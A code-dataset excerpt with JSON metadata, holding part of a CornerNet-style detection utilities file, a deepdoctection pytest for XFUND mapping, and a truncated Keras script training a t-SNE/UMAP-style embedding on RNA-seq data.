torch.sigmoid(tl_heat)\n br_heat = torch.sigmoid(br_heat)\n\n # perform nms on heatmaps\n tl_heat = _nms(tl_heat, kernel=kernel)\n br_heat = _nms(br_heat, kernel=kernel)\n\n ## on both the top-left and bottom-right heatmaps, find the K highest-scoring points and record their scores, positions, classes and coordinates; the results returned below are:\n ## class scores, position indices, classes, y coordinates, x coordinates\n tl_scores, tl_inds, tl_clses, tl_ys, tl_xs = _topk(tl_heat, K=K)\n br_scores, br_inds, br_clses, br_ys, br_xs = _topk(br_heat, K=K)\n\n tl_ys = tl_ys.view(batch, K, 1).expand(batch, K, K)\n tl_xs = tl_xs.view(batch, K, 1).expand(batch, K, K)\n br_ys = br_ys.view(batch, 1, K).expand(batch, K, K)\n br_xs = br_xs.view(batch, 1, K).expand(batch, K, K)\n\n if no_border:\n tl_ys_binds = (tl_ys == 0)\n tl_xs_binds = (tl_xs == 0)\n br_ys_binds = (br_ys == height - 1)\n br_xs_binds = (br_xs == width - 1)\n\n if tl_regr is not None and br_regr is not None:\n tl_regr = _tranpose_and_gather_feat(tl_regr, tl_inds)\n tl_regr = tl_regr.view(batch, K, 1, 2)\n br_regr = _tranpose_and_gather_feat(br_regr, br_inds)\n br_regr = br_regr.view(batch, 1, K, 2)\n\n tl_xs = tl_xs + tl_regr[..., 0]\n tl_ys = tl_ys + tl_regr[..., 1]\n br_xs = 
br_xs + br_regr[..., 0]\n br_ys = br_ys + br_regr[..., 1]\n\n # all possible boxes based on top k corners (ignoring class)\n bboxes = torch.stack((tl_xs, tl_ys, br_xs, br_ys), dim=3)\n\n tl_tag = _tranpose_and_gather_feat(tl_tag, tl_inds)\n tl_tag = tl_tag.view(batch, K, 1)\n br_tag = _tranpose_and_gather_feat(br_tag, br_inds)\n br_tag = br_tag.view(batch, 1, K)\n dists = torch.abs(tl_tag - br_tag)\n\n tl_scores = tl_scores.view(batch, K, 1).expand(batch, K, K)\n br_scores = br_scores.view(batch, 1, K).expand(batch, K, K)\n scores = (tl_scores + br_scores) / 2\n\n # reject boxes based on classes\n tl_clses = tl_clses.view(batch, K, 1).expand(batch, K, K)\n br_clses = br_clses.view(batch, 1, K).expand(batch, K, K)\n cls_inds = (tl_clses != br_clses)\n\n # reject boxes based on distances\n dist_inds = (dists > ae_threshold)\n\n # reject boxes based on widths and heights\n width_inds = (br_xs < tl_xs)\n height_inds = (br_ys < tl_ys)\n\n if no_border:\n scores[tl_ys_binds] = -1\n scores[tl_xs_binds] = -1\n scores[br_ys_binds] = -1\n scores[br_xs_binds] = -1\n\n scores[cls_inds] = -1\n scores[dist_inds] = -1\n scores[width_inds] = -1\n scores[height_inds] = -1\n\n scores = scores.view(batch, -1)\n scores, inds = torch.topk(scores, num_dets)\n scores = scores.unsqueeze(2)\n\n bboxes = bboxes.view(batch, -1, 4)\n bboxes = _gather_feat(bboxes, inds)\n\n clses = tl_clses.contiguous().view(batch, -1, 1)\n clses = _gather_feat(clses, inds).float()\n\n tl_scores = tl_scores.contiguous().view(batch, -1, 1)\n tl_scores = _gather_feat(tl_scores, inds).float()\n br_scores = br_scores.contiguous().view(batch, -1, 1)\n br_scores = _gather_feat(br_scores, inds).float()\n\n detections = torch.cat([bboxes, scores, tl_scores, br_scores, clses], dim=2)\n return detections\n\nclass upsample(nn.Module):\n def __init__(self, scale_factor):\n super(upsample, self).__init__()\n self.scale_factor = scale_factor\n\n def forward(self, x):\n return nn.functional.interpolate(x, scale_factor=self.scale_factor)\n\nclass merge(nn.Module):\n def forward(self, x, y):\n return x + y\n\nclass convolution(nn.Module):\n def __init__(self, k, inp_dim, out_dim, stride=1, with_bn=True):\n super(convolution, self).__init__()\n\n pad = (k - 1) // 2\n self.conv = nn.Conv2d(inp_dim, out_dim, (k, k), padding=(pad, pad), stride=(stride, stride), bias=not with_bn)\n self.bn = nn.BatchNorm2d(out_dim) if with_bn else nn.Sequential()\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.conv(x)\n bn = self.bn(conv)\n relu = self.relu(bn)\n return relu\n\nclass residual(nn.Module):\n def __init__(self, inp_dim, out_dim, k=3, stride=1):\n super(residual, self).__init__()\n p = (k - 1) // 2\n\n self.conv1 = nn.Conv2d(inp_dim, out_dim, (k, k), padding=(p, p), stride=(stride, stride), bias=False)\n self.bn1 = nn.BatchNorm2d(out_dim)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = nn.Conv2d(out_dim, out_dim, (k, k), padding=(p, p), bias=False)\n self.bn2 = nn.BatchNorm2d(out_dim)\n \n self.skip = nn.Sequential(\n nn.Conv2d(inp_dim, out_dim, (1, 1), stride=(stride, stride), bias=False),\n nn.BatchNorm2d(out_dim)\n ) if stride != 1 or inp_dim != out_dim else nn.Sequential()\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n bn1 = self.bn1(conv1)\n relu1 = self.relu1(bn1)\n\n conv2 = self.conv2(relu1)\n bn2 = self.bn2(conv2)\n\n skip = self.skip(x)\n return self.relu(bn2 + skip)\n\nclass corner_pool(nn.Module):\n def __init__(self, dim, pool1, pool2):\n super(corner_pool, 
self).__init__()\n self._init_layers(dim, pool1, pool2)\n\n def _init_layers(self, dim, pool1, pool2):\n self.p1_conv1 = convolution(3, dim, 128)\n self.p2_conv1 = convolution(3, dim, 128)\n\n self.p_conv1 = nn.Conv2d(128, dim, (3, 3), padding=(1, 1), bias=False)\n self.p_bn1 = nn.BatchNorm2d(dim)\n\n self.conv1 = nn.Conv2d(dim, dim, (1, 1), bias=False)\n self.bn1 = nn.BatchNorm2d(dim)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = convolution(3, dim, dim)\n\n self.pool1 = pool1()\n self.pool2 = pool2()\n\n def forward(self, x):\n # pool 1\n p1_conv1 = self.p1_conv1(x)\n pool1 = self.pool1(p1_conv1)\n\n # pool 2\n p2_conv1 = self.p2_conv1(x)\n pool2 = self.pool2(p2_conv1)\n\n # pool 1 + pool 2\n p_conv1 = self.p_conv1(pool1 + pool2)\n p_bn1 = self.p_bn1(p_conv1)\n\n conv1 = self.conv1(x)\n bn1 = self.bn1(conv1)\n relu1 = self.relu1(p_bn1 + bn1)\n\n conv2 = self.conv2(relu1)\n return conv2\n", "repo_name": "yujunliuCV/KDNet", "sub_path": "core/models/py_utils/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 12650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 105, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional.max_pool2d", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.topk", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 286, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 286, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 288, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 292, "usage_type": "attribute"}, 
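The `_topk` helper in the KDNet utils.py record above takes the top-k over the flattened (class, y, x) score volume and then unpacks the flat indices back into class ids and spatial coordinates. A standalone sketch of that index arithmetic, using `torch.div(..., rounding_mode='floor')` as the modern spelling of the record's old-style `(inds / n).int()` integer division:

import torch

def topk_demo(scores, k=4):
    # scores: (batch, classes, height, width) heatmap.
    batch, cat, height, width = scores.size()
    topk_scores, topk_inds = torch.topk(scores.view(batch, -1), k)
    # Flat index -> class id: each class owns a contiguous height*width block.
    topk_clses = torch.div(topk_inds, height * width, rounding_mode='floor')
    # Remainder within the class block -> spatial position.
    topk_inds = topk_inds % (height * width)
    topk_ys = torch.div(topk_inds, width, rounding_mode='floor')
    topk_xs = topk_inds % width
    return topk_scores, topk_clses, topk_ys, topk_xs

scores = torch.rand(1, 3, 8, 8)
print(topk_demo(scores))

`_decode` then pairs the top-k top-left corners with the top-k bottom-right corners and rejects pairs by class mismatch, embedding distance, and geometry.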
{"api_name": "torch.nn", "line_number": 292, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 297, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 297, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 298, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 299, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 307, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 307, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 314, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 317, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 319, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 321, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 322, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 323, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 323, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 345, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 345, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 346, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 346, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 348, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 349, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 350, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 350, "usage_type": "name"}]} +{"seq_id": "12963310263", "text": "from typing import Dict, Mapping\nfrom unittest.mock import MagicMock, patch\n\nfrom pytest import mark\n\nfrom deepdoctection.mapper.xfundstruct import xfund_to_image\nfrom deepdoctection.utils.detection_types import JsonDict\nfrom deepdoctection.utils.settings import CellType, LayoutType, ObjectTypes, TokenClasses, WordType\n\nfrom .conftest import get_always_pubtabnet_white_image\n\n\n@mark.basic\n@patch(\n 
\"deepdoctection.mapper.xfundstruct.load_image_from_file\", MagicMock(side_effect=get_always_pubtabnet_white_image)\n)\ndef test_xfund_to_image(\n datapoint_xfund: JsonDict,\n xfund_category_dict: Mapping[ObjectTypes, str],\n xfund_category_names: Dict[str, str],\n ner_token_to_id_mapping: JsonDict,\n) -> None:\n \"\"\"\n testing xfund_to_image is mapping correctly\n \"\"\"\n\n # Act\n xfund_to_image_func = xfund_to_image(\n False, False, xfund_category_dict, xfund_category_names, ner_token_to_id_mapping\n )\n img = xfund_to_image_func(datapoint_xfund)\n\n # Assert\n assert img\n word_anns = img.get_annotation(category_names=LayoutType.word)\n words = [ann.get_sub_category(WordType.characters).value for ann in word_anns] # type: ignore\n assert words == [\"Akademisches\", \"Auslandsamt\", \"Bewerbungsformular\"]\n\n sub_cats_category_names = [ann.get_sub_category(WordType.token_class).category_name for ann in word_anns]\n assert sub_cats_category_names == [TokenClasses.other, TokenClasses.other, CellType.header]\n\n sub_cats_ner_tags = [ann.get_sub_category(WordType.tag).category_name for ann in word_anns]\n assert sub_cats_ner_tags == [\"O\", \"O\", \"B\"]\n\n text_anns = img.get_annotation(category_names=LayoutType.text)\n sub_cats_category_names = [ann.get_sub_category(WordType.token_class).category_name for ann in text_anns]\n assert sub_cats_category_names == [TokenClasses.other, TokenClasses.header]\n", "repo_name": "deepdoctection/deepdoctection", "sub_path": "tests/mapper/test_xfundstruct.py", "file_name": "test_xfundstruct.py", "file_ext": "py", "file_size_in_byte": 1857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1814, "dataset": "github-code", "pt": "52", "api": [{"api_name": "deepdoctection.utils.detection_types.JsonDict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 19, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.ObjectTypes", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.JsonDict", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.mapper.xfundstruct.xfund_to_image", "line_number": 28, "usage_type": "call"}, {"api_name": "deepdoctection.utils.settings.LayoutType.word", "line_number": 35, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.LayoutType", "line_number": 35, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.characters", "line_number": 36, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 36, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.token_class", "line_number": 39, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 39, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.other", "line_number": 40, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.TokenClasses", "line_number": 40, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.CellType.header", "line_number": 40, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.CellType", "line_number": 40, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.tag", "line_number": 42, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 42, "usage_type": "name"}, {"api_name": 
"deepdoctection.utils.settings.LayoutType.text", "line_number": 45, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.LayoutType", "line_number": 45, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.token_class", "line_number": 46, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 46, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.other", "line_number": 47, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.TokenClasses", "line_number": 47, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.header", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pytest.mark.basic", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 13, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 14, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 15, "usage_type": "call"}, {"api_name": "conftest.get_always_pubtabnet_white_image", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "30790497264", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 4 20:20:02 2021\r\n\r\n@author: Summer\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 16 09:59:11 2020\r\n\r\n@author: Summer\r\n\"\"\"\r\n\r\nimport numpy as np\r\nnp.random.seed(71)\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\n#from memory_profiler import profile\r\nfrom keras import backend as K\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\nfrom keras.layers import BatchNormalization,Embedding, Conv1D,Reshape,GlobalAveragePooling1D\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import Callback\r\nfrom keras.utils import np_utils\r\nfrom keras.objectives import categorical_crossentropy\r\nfrom keras.datasets import mnist,fashion_mnist,cifar10,imdb\r\nfrom sklearn.model_selection import train_test_split\r\nimport metrics\r\nimport sklearn\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport copy\r\nfrom sklearn.metrics import classification_report\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import ArtistAnimation\r\nfrom SA_layer import *\r\nfrom umap_utils import *\r\nimport multiprocessing as mp\r\nfrom keras.models import load_model\r\nfrom keras.models import Model\r\nimport gc\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"7\"\r\n\r\n\r\nbatch_size = 2500\r\nlow_dim =2\r\nnb_epoch = 550\r\n\r\nshuffle_interval = nb_epoch + 1\r\n\r\nperplexity = 30.0\r\n\r\nnp.seterr(divide='ignore',invalid='ignore')\r\n\r\ndef Hbeta(D, beta):\r\n P = np.exp(-D * beta)\r\n sumP = np.sum(P)\r\n H = np.log(sumP) + beta * np.sum(D * P) / sumP\r\n P = P / sumP\r\n return H, P\r\n\r\ndef x2p_job(data):\r\n i, Di, tol, logU = data\r\n beta = 1.0\r\n betamin = -np.inf\r\n betamax = np.inf\r\n H, thisP = Hbeta(Di, beta)\r\n Hdiff = 100*tol\r\n# Hdiff = H - logU\r\n tries = 0\r\n # while np.abs(Hdiff) > tol and tries < 50:\r\n while tries < 50:\r\n H, thisP = Hbeta(Di, beta)\r\n Hdiff = H - logU\r\n tries += 1\r\n if Hdiff > 0:\r\n betamin = beta\r\n if betamax == -np.inf:\r\n beta = beta * 2\r\n else:\r\n beta = (betamin + betamax) / 2\r\n else:\r\n betamax = beta\r\n if betamin == -np.inf:\r\n beta = beta / 2\r\n 
else:\r\n beta = (betamin + betamax) / 2\r\n\r\n return i, thisP\r\n\r\n\r\ndef x2p(X,perplexity):\r\n # tol = 1e-5\r\n tol = 1e-4\r\n n = X.shape[0]\r\n logU = np.log(perplexity)\r\n \r\n sum_X = np.sum(np.square(X), axis=1)\r\n D = sum_X + (sum_X.reshape([-1, 1]) - 2 * np.dot(X, X.T))\r\n\r\n idx = (1 - np.eye(n)).astype(bool)\r\n D = D[idx].reshape([n, -1])\r\n\r\n result=[]\r\n for i in range(n):\r\n data_setin=i, D[i], tol, logU\r\n result1=x2p_job(data_setin)\r\n result.append(result1)\r\n P = np.zeros([n, n])\r\n for i, thisP in result:\r\n P[i, idx[i]] = thisP\r\n return P\r\n\r\n\r\ndef calculate_P(X):\r\n# print (\"Computing pairwise distances...\")\r\n n = X.shape[0]\r\n P = np.zeros([n, batch_size])\r\n for i in range(0, n, batch_size):\r\n P_batch = x2p(X[i:i + batch_size],perplexity)\r\n# print(P_batch)\r\n P_batch[np.isnan(P_batch)] = 0\r\n P_batch = P_batch + P_batch.T\r\n \r\n #exaggerate\r\n P_batch = P_batch*2\r\n \r\n P_batch = P_batch / P_batch.sum()\r\n P_batch = np.maximum(P_batch, 1e-12) \r\n P[i:i + batch_size] = P_batch\r\n return P\r\n\r\ndef CEumap(X, Y):\r\n a=1.929\r\n b=0.7915\r\n sum_Y = K.sum(K.square(Y), axis=1)\r\n eps = K.variable(10e-15)\r\n D = sum_Y + K.reshape(sum_Y, [-1, 1]) - 2 * K.dot(Y, K.transpose(Y))\r\n Q = K.pow(1 + a*D, -(2*b) / 2)\r\n Q *= K.variable(1 - np.eye(batch_size))\r\n Q /= K.sum(Q)\r\n Q = K.maximum(Q, eps) \r\n X /= K.sum(X)\r\n C1 = K.sum(X*K.log((X + eps) / (Q + eps)))\r\n C2 = K.sum((1-X)*K.log(((1-X) + eps) / ((1-Q) + eps)))\r\n C=C1+C2\r\n return C\r\n\r\n\r\ndef cal_matrix_P(X,neighbors):\r\n entropy=np.log(neighbors)\r\n n1,n2=X.shape\r\n D=np.square(sklearn.metrics.pairwise_distances(X))\r\n D_sort=np.argsort(D,axis=1)\r\n P=np.zeros((n1,n1))\r\n for i in range(n1):\r\n Di=D[i,D_sort[i,1:]]\r\n P[i,D_sort[i,1:]]=cal_p(Di,entropy=entropy)\r\n P=(P+np.transpose(P))/(2*n1)\r\n P=np.maximum(P,1e-100)\r\n return P\r\n\r\n\r\ndef cal_p(D,entropy,K=50):\r\n beta=1.0\r\n H=cal_entropy(D,beta)\r\n error=H-entropy\r\n k=0\r\n betamin=-np.inf\r\n betamax=np.inf\r\n while np.abs(error)>1e-4 and k<=K:\r\n if error > 0:\r\n betamin=copy.deepcopy(beta)\r\n if betamax==np.inf:\r\n beta=beta*2\r\n else:\r\n beta=(beta+betamax)/2\r\n else:\r\n betamax=copy.deepcopy(beta)\r\n if betamin==-np.inf:\r\n beta=beta/2\r\n else:\r\n beta=(beta+betamin)/2\r\n H=cal_entropy(D,beta)\r\n error=H-entropy\r\n k+=1\r\n P=np.exp(-D*beta)\r\n P=P/np.sum(P)\r\n return P\r\n\r\n\r\ndef cal_entropy(D,beta):\r\n # P=numpy.exp(-(numpy.sqrt(D))*beta)\r\n P=np.exp(-D*beta)\r\n sumP=sum(P)\r\n sumP=np.maximum(sumP,1e-200)\r\n H=np.log(sumP) + beta * np.sum(D * P) / sumP\r\n return H\r\n\r\ndef KLdivergence(P, Y):\r\n alpha = low_dim - 1.\r\n sum_Y = K.sum(K.square(Y), axis=1)\r\n eps = K.variable(10e-15)\r\n D = sum_Y + K.reshape(sum_Y, [-1, 1]) - 2 * K.dot(Y, K.transpose(Y))\r\n Q = K.pow(1 + D / alpha, -(alpha + 1) / 2)\r\n Q *= K.variable(1 - np.eye(batch_size))\r\n Q /= K.sum(Q)\r\n Q = K.maximum(Q, eps)\r\n C = K.log((P + eps) / (Q + eps))\r\n C = K.sum(P * C)\r\n return C\r\n\r\n\r\nprint (\"load data\")\r\n# # RNA-SEQ\r\n#X_train1=np.load('E:/RNA_SEQ/X.npy')\r\nX_train1=np.load('/.../data/X.npy')\r\nX_train=X_train1[0:22500]\r\n#color=np.load('E:/RNA_SEQ/color.npy')\r\ncolor1=np.load('/.../data/color.npy')\r\ncolor1=color1[0:22500]\r\ncolor2=np.load('/.../data/color_class.npy')\r\ncolor2=color2[0:22500]\r\nn=22500\r\nchannel=1\r\nbatch_num = int(n // batch_size)\r\nm = batch_num * batch_size\r\n\r\n\r\nmodel = Sequential()\r\n\r\n## vector-based 
model\r\nmodel.add(Dense(500, input_shape=(X_train.shape[1],)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(2000))\r\nmodel.add(Activation('relu',name='Dense1'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu',name='Dense2'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(100))\r\nmodel.add(Activation('relu',name='Dense3'))\r\nmodel.add(BatchNormalization())\r\n#model.add(Dense(50))\r\n#model.add(Activation('relu'))\r\nmodel.add(Dense(2))\r\n\r\n\r\nmodel.compile(loss=KLdivergence, optimizer=\"adam\")\r\n\r\n \r\nprint (\"fit\")\r\nimages = []\r\nfig = plt.figure(figsize=(5, 5))\r\nloss_record=[]\r\nfor epoch in range(nb_epoch):\r\n ## shuffle X_train and calculate P in different recursions \r\n if epoch % shuffle_interval == 0:\r\n\r\n X = X_train\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(X[i:i+batch_size],30)\r\n low_para1=calculate_P(X[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==150: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense1').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==250: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense2').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==350: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense3').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==450: \r\n \r\n model.compile(loss=CEumap, optimizer=\"adam\")\r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense3').output)\r\n X1 = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n test_hv=hd_v(X1[i:i+batch_size])\r\n low_para1=test_hv.toarray()\r\n low_para.append(low_para1)\r\n\r\n\r\n # train\r\n\r\n loss=0\r\n temp_lp=0\r\n for i in range(0, n, batch_size):\r\n low_para_temp1=low_para[temp_lp]\r\n loss += model.train_on_batch(X_train[i:i+batch_size], low_para_temp1)\r\n temp_lp=temp_lp+1\r\n loss_record.append(loss / batch_num)\r\n print (\"Epoch: {}/{}, loss: {}\".format(epoch+1, nb_epoch, loss / batch_num))\r\n if epoch==149:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred1 = model.predict(X_train)\r\n plt.scatter(pred1[:, 0], pred1[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector1_train_pre.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred1 = model.predict(X_train)\r\n plt.scatter(pred1[:, 0], pred1[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n 
plt.savefig(\"/.../RNA/vector2_train_pre.png\")\r\n model.save('/.../RNA/model_vector_pre.h5') \r\n if epoch==249:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred3 = model.predict(X_train)\r\n plt.scatter(pred3[:, 0], pred3[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector1_train_re1.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred3 = model.predict(X_train)\r\n plt.scatter(pred3[:, 0], pred3[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/.../RNA/vector2_train_re1.png\")\r\n model.save('/.../RNA/model_vector_re1.h5')\r\n if epoch==349:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred5 = model.predict(X_train)\r\n plt.scatter(pred5[:, 0], pred5[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n plt.savefig(\"/storage/DRE_submission/RNA/vector1_train_re2.png\")\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred5 = model.predict(X_train)\r\n plt.scatter(pred5[:, 0], pred5[:, 1], marker='o', s=0.5, color=color2[0:22500])\r\n fig.tight_layout()\r\n 